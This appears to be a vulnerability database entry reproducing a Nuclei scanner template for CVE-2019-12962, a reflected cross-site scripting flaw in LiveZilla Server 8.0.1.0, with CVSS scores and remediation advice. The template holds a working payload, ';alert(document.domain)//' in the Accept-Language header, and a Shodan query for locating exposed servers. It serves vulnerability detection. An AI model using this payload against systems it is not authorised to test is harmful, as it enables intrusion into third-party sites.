Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-12962
HistoryMay 08, 2022 - 2:45 p.m.

LiveZilla Server 8.0.1.0 - Cross-Site Scripting

2022-05-0814:45:08
ProjectDiscovery
github.com
1

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.173 Low

EPSS

Percentile

96.1%

LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
id: CVE-2019-12962

info:
  name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting
  author: Clment Cruchet
  severity: medium
  description: |
    LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
  remediation: |
    Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49669
    - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/
    - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12962
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-12962
    cwe-id: CWE-79
    epss-score: 0.17333
    epss-percentile: 0.95984
    cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: livezilla
    product: livezilla
    shodan-query: http.html:LiveZilla
  tags: cve,cve2019,xss,edb,packetstorm,livezilla

http:
  - method: GET
    path:
      - '{{BaseURL}}/mobile/index.php'

    headers:
      Accept-Language: ';alert(document.domain)//'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var detectedLanguage = ';alert(document.domain)//';"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220730404803aefaab9552a359a9109e306f61b6f746b25c25c309b98bb2769cc44022100afd816ccce19408b01fe5861f8ea76986010736a6cdc3ffba50658a7a50a73d6:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.173 Low

EPSS

Percentile

96.1%